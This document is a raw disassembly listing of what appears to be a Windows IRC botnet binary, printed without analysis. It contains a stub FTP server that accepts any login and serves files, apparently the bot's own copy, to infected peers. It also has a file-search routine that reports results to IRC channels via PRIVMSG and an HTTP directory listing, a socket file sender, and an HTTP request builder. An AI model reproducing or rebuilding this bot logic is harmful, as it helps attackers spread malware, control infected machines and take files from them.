mov edi, offset aUser_0 ; "USER"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_403E63
push eax
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_404146
; ---------------------------------------------------------------------------
loc_403E63: ; CODE XREF: sub_403BFF+255�j
mov edi, offset aPass ; "PASS"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_403E80
push eax
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_404146
; ---------------------------------------------------------------------------
loc_403E80: ; CODE XREF: sub_403BFF+272�j
mov edi, offset aSyst ; "SYST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_403E9D
push eax
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_404146
; ---------------------------------------------------------------------------
loc_403E9D: ; CODE XREF: sub_403BFF+28F�j
mov edi, offset aRest ; "REST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_403EBA
push eax
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_404146
; ---------------------------------------------------------------------------
loc_403EBA: ; CODE XREF: sub_403BFF+2AC�j
push 4
mov edi, offset off_4211C0
lea esi, [ebp+74h+var_AC]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_403ED8
push eax
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_404146
; ---------------------------------------------------------------------------
loc_403ED8: ; CODE XREF: sub_403BFF+2CA�j
mov eax, offset aType ; "TYPE"
mov ecx, edx
mov edi, eax
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz short loc_403F0B
push 2
mov edi, offset aA_0 ; "A"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_403F0B
push edx
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_404146
; ---------------------------------------------------------------------------
loc_403F0B: ; CODE XREF: sub_403BFF+2E9�j
; sub_403BFF+2FD�j
mov edi, eax
push 5
pop eax
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_403F3C
push 2
mov edi, offset aI ; "I"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_403F3C
push edx
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_404146
; ---------------------------------------------------------------------------
loc_403F3C: ; CODE XREF: sub_403BFF+31A�j
; sub_403BFF+32E�j
mov edi, offset aPasv ; "PASV"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_403F7B
push 0Ah
pop ecx
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+74h+var_124]
rep movsd
lea eax, [ebp+74h+var_124]
movsw
lea edx, [eax+1]
loc_403F67: ; CODE XREF: sub_403BFF+36D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403F67
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_124]
jmp short loc_403FAF
; ---------------------------------------------------------------------------
loc_403F7B: ; CODE XREF: sub_403BFF+34B�j
mov edi, offset aList ; "LIST"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
mov ecx, eax
jnz short loc_403FB5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+74h+var_C4]
rep movsd
movsw
lea eax, [ebp+74h+var_C4]
movsb
lea edx, [eax+1]
loc_403FA0: ; CODE XREF: sub_403BFF+3A6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403FA0
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_C4]
loc_403FAF: ; CODE XREF: sub_403BFF+37A�j
push eax
jmp loc_404146
; ---------------------------------------------------------------------------
loc_403FB5: ; CODE XREF: sub_403BFF+38C�j
mov edi, offset aPort ; "PORT"
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz loc_404079
lea eax, [ebp+74h+var_2D0]
push eax
lea eax, [ebp+74h+var_F8]
push eax
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_4145F3
lea eax, [ebp+74h+var_F8]
push eax
call sub_4147A2
mov esi, eax
lea eax, [ebp+74h+var_2D0]
push eax
call sub_4147A2
push 0Ch
mov edx, eax
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_F8]
rep stosd
push edx
push esi
stosw
lea eax, [ebp+74h+var_F8]
push offset aXX ; "%x%x\n"
push eax
call sub_414415
push 10h
lea eax, [ebp+74h+var_F8]
push 0
push eax
call sub_415239
mov [ebp+74h+var_10], eax
add esp, 44h
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_414415
add esp, 18h
push 0
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_404146
; ---------------------------------------------------------------------------
loc_404079: ; CODE XREF: sub_403BFF+3C2�j
mov edi, offset aRetr ; "RETR"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz loc_40412E
push edx
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+74h+arg_0]
call ebx ; send
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_48]
push eax
call sub_403AF0
cmp eax, 1
pop ecx
pop ecx
jnz short loc_404123
call sub_403B6D
cmp eax, 1
jnz loc_40414B
xor esi, esi
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+74h+arg_0]
call ebx ; send
lea eax, [ebp+74h+var_6D8]
push eax
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_8DC]
push offset aFtpFileTransfe ; "[FTP]: File transfer complete to IP: %s"...
push eax
call sub_414415
add esp, 10h
cmp [ebp+74h+var_440], esi
jnz short loc_404114
push esi
push [ebp+74h+var_444]
lea eax, [ebp+74h+var_8DC]
push eax
lea eax, [ebp+74h+var_4C4]
push eax
push [ebp+74h+var_6DC]
call sub_4056BF
add esp, 14h
loc_404114: ; CODE XREF: sub_403BFF+4F0�j
lea eax, [ebp+74h+var_8DC]
push eax
call sub_401EFF
pop ecx
jmp short loc_40414B
; ---------------------------------------------------------------------------
loc_404123: ; CODE XREF: sub_403BFF+4AC�j
push 0
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_404146
; ---------------------------------------------------------------------------
loc_40412E: ; CODE XREF: sub_403BFF+488�j
mov ecx, eax
mov edi, offset aQuit ; "QUIT"
lea esi, [ebp+74h+var_AC]
xor eax, eax
repe cmpsb
jnz short loc_40414B
push eax
push 0Dh
push offset a221Goodbye_ ; "221 Goodbye.\n"
loc_404146: ; CODE XREF: sub_403BFF+25F�j
; sub_403BFF+27C�j ...
push [ebp+74h+arg_0]
call ebx ; send
loc_40414B: ; CODE XREF: sub_403BFF+4B6�j
; sub_403BFF+522�j ...
mov esi, [ebp+74h+arg_0]
push 19h
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_29C]
rep stosd
loc_40415B: ; CODE XREF: sub_403BFF+151�j
; sub_403BFF+179�j ...
inc esi
cmp esi, [ebp+74h+var_4]
mov [ebp+74h+arg_0], esi
jle loc_403D2C
loc_404168: ; CODE XREF: sub_403BFF+127�j
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
push eax
mov eax, [ebp+74h+var_4]
inc eax
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
push eax
rep movsd
call ds:dword_4201EC ; select
cmp eax, 0FFFFFFFFh
jnz loc_403D1E
loc_404199: ; CODE XREF: sub_403BFF+C9�j
; sub_403BFF+113�j
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
add ebp, 74h
leave
retn 4
sub_403BFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041A6 proc near ; CODE XREF: sub_404AC0+149�p
; sub_4089DC+38F4�p
var_598 = byte ptr -598h
var_494 = byte ptr -494h
var_38C = dword ptr -38Ch
var_378 = byte ptr -378h
var_36C = dword ptr -36Ch
var_360 = byte ptr -360h
var_24C = byte ptr -24Ch
var_4C = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 598h
push ebx
push esi
push edi
push 41h
pop ecx
xor eax, eax
lea edi, [ebp+var_598]
rep stosd
mov edi, [ebp+arg_0]
xor ebx, ebx
push offset asc_4216D8 ; "\n"
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_415289
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
jz short loc_4041FF
push edi
push [ebp+arg_8]
mov esi, 200h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41466D
add esp, 14h
jmp loc_40431C
; ---------------------------------------------------------------------------
loc_4041FF: ; CODE XREF: sub_4041A6+34�j
cmp [ebp+arg_C], ebx
jz loc_404301
mov eax, edi
lea ecx, [eax+1]
loc_40420D: ; CODE XREF: sub_4041A6+6C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40420D
push edi
sub eax, ecx
and [eax+edi-1], dl
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_40423E: ; CODE XREF: sub_4041A6+9D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40423E
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_404278: ; CODE XREF: sub_4041A6+D7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404278
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
mov eax, edi
lea ecx, [eax+1]
loc_404298: ; CODE XREF: sub_4041A6+F7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404298
push 3Ch
push 96h
push 0E6h
sub eax, ecx
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 18h
lea ecx, [eax+1]
loc_4042CF: ; CODE XREF: sub_4041A6+12E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4042CF
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41466D
add esp, 0Ch
jmp short loc_40431C
; ---------------------------------------------------------------------------
loc_404301: ; CODE XREF: sub_4041A6+5C�j
push edi
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41466D
add esp, 10h
loc_40431C: ; CODE XREF: sub_4041A6+54�j
; sub_4041A6+159�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_404325: ; CODE XREF: sub_4041A6+184�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404325
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
mov eax, [ebp+arg_C]
cmp eax, ebx
jz loc_4043CF
lea edx, [eax+1]
loc_40434E: ; CODE XREF: sub_4041A6+1AD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40434E
sub eax, edx
cmp eax, 2
jbe short loc_4043CF
mov eax, [ebp+arg_C]
lea edx, [eax+1]
loc_404362: ; CODE XREF: sub_4041A6+1C1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404362
sub eax, edx
add eax, 0FFFFFFFDh
cmp eax, ebx
jz short loc_40437E
loc_404372: ; CODE XREF: sub_4041A6+1D6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_40437E
dec eax
jnz short loc_404372
loc_40437E: ; CODE XREF: sub_4041A6+1CA�j
; sub_4041A6+1D3�j
inc eax
push eax
push [ebp+arg_C]
lea eax, [ebp+var_598]
push eax
call sub_4144A0
lea eax, [ebp+var_598]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 1Ch
lea ecx, [eax+1]
loc_4043B4: ; CODE XREF: sub_4041A6+213�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4043B4
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
loc_4043CF: ; CODE XREF: sub_4041A6+19F�j
; sub_4041A6+1B4�j
lea eax, [ebp+var_38C]
push eax
push edi
call ds:dword_420054 ; FindFirstFileA
lea ecx, [ebp+var_38C]
push ecx
push eax
mov [ebp+var_C], eax
call ds:dword_420050 ; FindNextFileA
test eax, eax
jz loc_4047FC
mov ebx, 1FFh
loc_4043FB: ; CODE XREF: sub_4041A6+650�j
cmp [ebp+var_38C], 0
jz loc_4047E4
push 3
mov edi, offset a__ ; ".."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_4047E4
push 2
mov edi, offset a__0 ; "."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_4047E4
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_378]
push eax
call ds:dword_420068 ; FileTimeToLocalFileTime
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call ds:dword_420064 ; FileTimeToSystemTime
mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm ; "PM"
ja loc_4044F9
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_404472: ; CODE XREF: sub_4041A6+359�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+var_4C]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_414415
add esp, 20h
xor edi, edi
test byte ptr [ebp+var_38C], 10h
jz loc_404648
inc [ebp+var_8]
cmp [ebp+arg_8], edi
jz short loc_404504
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_41466D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push 200h
push eax
call sub_41466D
add esp, 28h
jmp loc_4047B0
; ---------------------------------------------------------------------------
loc_4044F9: ; CODE XREF: sub_4041A6+2BE�j
movzx eax, ax
sub eax, 0Ch
jmp loc_404472
; ---------------------------------------------------------------------------
loc_404504: ; CODE XREF: sub_4041A6+308�j
cmp [ebp+arg_C], edi
jz loc_404602
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_404530: ; CODE XREF: sub_4041A6+38F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404530
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS_2 ; "%s%s/"
push ebx
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_404573: ; CODE XREF: sub_4041A6+3D2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404573
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_404597: ; CODE XREF: sub_4041A6+3F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404597
sub eax, esi
cmp eax, 1Eh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_4045B9
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4045BE
; ---------------------------------------------------------------------------
loc_4045B9: ; CODE XREF: sub_4041A6+40A�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4045BE: ; CODE XREF: sub_4041A6+411�j
push ebx
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_4045D1: ; CODE XREF: sub_4041A6+430�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045D1
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push ebx
jmp loc_4047A1
; ---------------------------------------------------------------------------
loc_404602: ; CODE XREF: sub_4041A6+361�j
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_41466D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_40462F: ; CODE XREF: sub_4041A6+4CA�j
lea eax, [ebp+var_24C]
push 200h
push eax
call sub_41466D
add esp, 24h
jmp loc_4047B0
; ---------------------------------------------------------------------------
loc_404648: ; CODE XREF: sub_4041A6+2FC�j
inc [ebp+var_4]
cmp [ebp+arg_8], edi
jz short loc_404672
push edi
push [ebp+var_36C]
call sub_402B01
push eax
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_40462F
; ---------------------------------------------------------------------------
loc_404672: ; CODE XREF: sub_4041A6+4A8�j
cmp [ebp+arg_C], edi
jz loc_404786
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_40469E: ; CODE XREF: sub_4041A6+4FD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40469E
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS ; "%s%s"
push ebx
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_4046E1: ; CODE XREF: sub_4041A6+540�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4046E1
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_404705: ; CODE XREF: sub_4041A6+564�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404705
sub eax, esi
cmp eax, 1Fh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_404727
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_40472C
; ---------------------------------------------------------------------------
loc_404727: ; CODE XREF: sub_4041A6+578�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_40472C: ; CODE XREF: sub_4041A6+57F�j
push ebx
push eax
call sub_41466D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_40473F: ; CODE XREF: sub_4041A6+59E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40473F
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
mov eax, [ebp+var_36C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41466D
add esp, 1Ch
jmp short loc_4047B0
; ---------------------------------------------------------------------------
loc_404786: ; CODE XREF: sub_4041A6+4CF�j
push [ebp+var_36C]
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push 200h
loc_4047A1: ; CODE XREF: sub_4041A6+457�j
lea eax, [ebp+var_24C]
push eax
call sub_41466D
add esp, 18h
loc_4047B0: ; CODE XREF: sub_4041A6+34E�j
; sub_4041A6+49D�j ...
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_4047B9: ; CODE XREF: sub_4041A6+618�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4047B9
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
cmp [ebp+arg_8], edi
jz short loc_4047E4
push 0FAh
call ds:dword_420000 ; Sleep
loc_4047E4: ; CODE XREF: sub_4041A6+25C�j
; sub_4041A6+274�j ...
lea eax, [ebp+var_38C]
push eax
push [ebp+var_C]
call ds:dword_420050 ; FindNextFileA
test eax, eax
jnz loc_4043FB
loc_4047FC: ; CODE XREF: sub_4041A6+24A�j
push [ebp+var_C]
call ds:dword_42004C ; FindClose
xor esi, esi
cmp [ebp+arg_8], esi
jz short loc_404841
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_402B01
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_402B01
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_414415
add esp, 14h
jmp short loc_40486F
; ---------------------------------------------------------------------------
loc_404841: ; CODE XREF: sub_4041A6+664�j
cmp [ebp+arg_C], esi
lea eax, [ebp+var_24C]
jz short loc_40485B
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_414415
pop ecx
pop ecx
jmp short loc_40486F
; ---------------------------------------------------------------------------
loc_40485B: ; CODE XREF: sub_4041A6+6A4�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_414415
add esp, 10h
loc_40486F: ; CODE XREF: sub_4041A6+699�j
; sub_4041A6+6B3�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_404878: ; CODE XREF: sub_4041A6+6D7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404878
push esi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43589C ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4041A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40489A proc near ; CODE XREF: sub_404AC0+12B�p
var_40C = byte ptr -40Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
push ebx
push esi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov [ebp+var_4], 400h
mov [ebp+var_C], esi
call ds:dword_420044 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_404957
push esi
push ebx
call ds:dword_420094 ; GetFileSize
mov edx, eax
cmp edx, esi
mov [ebp+var_8], edx
jz short loc_404950
push edi
jmp short loc_4048E8
; ---------------------------------------------------------------------------
loc_4048E5: ; CODE XREF: sub_40489A+B3�j
mov edx, [ebp+var_8]
loc_4048E8: ; CODE XREF: sub_40489A+49�j
xor eax, eax
cmp [ebp+var_4], edx
mov ecx, 100h
lea edi, [ebp+var_40C]
rep stosd
jbe short loc_4048FF
mov [ebp+var_4], edx
loc_4048FF: ; CODE XREF: sub_40489A+60�j
push 2
push esi
neg edx
push edx
push ebx
call ds:dword_420090 ; SetFilePointer
push esi
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push ebx
call ds:dword_42008C ; ReadFile
push esi
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push [ebp+arg_0]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40494A
call dword_4358C0 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_40494F
xor eax, eax
loc_40494A: ; CODE XREF: sub_40489A+9F�j
sub [ebp+var_8], eax
jnz short loc_4048E5
loc_40494F: ; CODE XREF: sub_40489A+AC�j
pop edi
loc_404950: ; CODE XREF: sub_40489A+46�j
push ebx
call ds:dword_42003C ; CloseHandle
loc_404957: ; CODE XREF: sub_40489A+31�j
pop esi
pop ebx
leave
retn
sub_40489A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40495B proc near ; CODE XREF: sub_404C2E+182�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ebx
mov ecx, eax
push esi
xor esi, esi
lea edx, [ecx+1]
loc_40496A: ; CODE XREF: sub_40495B+14�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_40496A
sub ecx, edx
mov [ebp+arg_0], ecx
jz short loc_404995
loc_404978: ; CODE XREF: sub_40495B+38�j
cmp byte ptr [esi+eax], 5Ch
jnz short loc_404982
mov byte ptr [esi+eax], 2Fh
loc_404982: ; CODE XREF: sub_40495B+21�j
mov ecx, eax
inc esi
lea edx, [ecx+1]
loc_404988: ; CODE XREF: sub_40495B+32�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_404988
sub ecx, edx
cmp esi, ecx
jb short loc_404978
loc_404995: ; CODE XREF: sub_40495B+1B�j
pop esi
pop ebx
pop ebp
retn
sub_40495B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404999 proc near ; CODE XREF: sub_4089DC+51FF�p
var_4A4 = byte ptr -4A4h
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A4h
push edi
lea eax, [ebp+var_4A4]
push eax
push 101h
call dword_435818 ; WSAStartup
push 6
push 1
push 2
call dword_435808 ; socket
push [ebp+arg_14]
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
mov [ebp+var_14], 2
call dword_435954 ; htons
push [ebp+arg_10]
mov [ebp+var_12], ax
call sub_407BFF
pop ecx
mov [ebp+var_10], eax
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
call dword_4357C0 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_404A79
mov eax, [ebp+arg_20]
test eax, eax
jnz short loc_404A0C
mov eax, (offset asc_420AE8+2)
loc_404A0C: ; CODE XREF: sub_404999+6C�j
push ebx
push esi
push [ebp+arg_10]
mov ebx, 100h
push eax
push [ebp+arg_1C]
lea eax, [ebp+var_114]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push ebx
push eax
call sub_41466D
lea eax, [ebp+var_114]
add esp, 1Ch
lea esi, [eax+1]
loc_404A3B: ; CODE XREF: sub_404999+A7�j
